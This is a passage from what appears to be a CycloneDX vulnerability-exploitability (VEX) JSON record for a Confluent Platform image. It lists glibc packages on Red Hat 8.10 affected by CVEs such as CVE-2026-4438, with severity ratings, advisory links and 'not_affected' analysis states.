          "ref": "pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.28-251.el8_10.40",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.28-251.el8_10.40",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-4438",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        20,
        88
      ],
      "description": "Calling gethostbyaddr or gethostbyaddr_r with a configured nsswitch.conf that specifies the library's DNS backend in the GNU C library version 2.34 to version 2.43 could result in an invalid DNS hostname being returned to the caller in violation of the DNS specification.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-4438"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:19061"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:20597"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-4438"
        },
        {
          "url": "https://bugzilla.redhat.com/2449777"
        },
        {
          "url": "https://bugzilla.redhat.com/2449783"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2449777"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2449783"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2453117"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-082556.html"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4046"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4437"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4438"
        },
        {
          "url": "https://errata.almalinux.org/10/ALSA-2026-19061.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:20597"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-4438.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-500006.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-4438"
        },
        {
          "url": "https://sourceware.org/bugzilla/show_bug.cgi?id=34015"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8611-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-4438"
        },
        {
          "url": "https://www.openwall.com/lists/oss-security/2026/03/23/2"
        }
      ],
      "published": "2026-03-20T20:16:49+00:00",
      "updated": "2026-07-14T13:18:58+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.28-251.el8_10.40",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.28-251.el8_10.40",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.28-251.el8_10.40",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-44431",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Apip"
      },
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ghsa"
          },
          "score": 5.3,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
        },
        {
          "source": {
